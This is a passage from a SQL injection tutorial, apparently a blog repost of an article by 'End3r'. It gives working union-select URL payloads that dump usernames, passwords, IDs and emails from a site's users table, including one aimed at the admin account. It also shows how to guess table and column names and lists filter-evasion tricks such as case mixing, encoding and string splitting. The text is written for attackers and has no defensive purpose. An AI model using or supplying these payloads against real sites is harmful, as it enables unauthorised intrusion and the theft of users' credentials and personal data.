
Until no more tables show, then you can do the same for the columns.

3) Now after you've executed one or all of those statements, let's say you found the table 'users' and it has the columns 'username', 'password', 'id', and 'email'. To extract that info from the table, use:

/index.php?id=null union all select 1,2,3,4,concat(username, char(58), password, char(58), id, char(58), email),6,7,8,9,10,11,12,13,14,15 from users--

And you'll get the info you requested, of course you can modify that as you like such as:

-/index.php?id=null union all select 1,2,3,4,username,6,password,8,9,10,11,12,13,14,15 from users where id=1--

-/index.php?id=null union all select 1,2,3,4,concat(password, char(58), id, char(58), email),6,7,8,9,10,11,12,13,14,15 from users where username='Admin'

Replacing Admin with the top user's name such as admin or owner etc..

Final Tips

With any luck, one of these methods has worked for you and you were able to accomplish your goal. However, if none of them worked, you can start guessing common table names and then columns:

/index.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from users

If the page shows up, you know the table exists and you can start guessing column names:

/index.php?id=null union all select 1,2,3,4,username,6,7,8,9,10,11,12,13,14,15 from users

If you get a username, good job you guessed a correct table and column, otherwise keep guessing.

Filter Evasion Techniques

  • You can URL Encode characters, hex encode them, use any encoding you like as long as your browser can interpret it
  • Rather then using 'union all select' try 'UniON aLL SeLECt' to see if the filter checks case
  • Try using the plus sign to split words up: ' 'uni'+'on'+' '+'all'+' '+'Se'+'lect'
  • Combine the methods mentioned above using different cases, the plus operator, and not just text but encoding as well
  • Be creative


As End3r summarises it -

“Thank you for reading my article, please comment if you found it interesting, found it helpful, or even hated it.

I'd like to thank Rebirth, killerguppy101, & Cr1t1cal for helping me get interested in and learn more about SQL Injections.

Thanks for reading,”


Like This post ?  You can buy me a coffee :)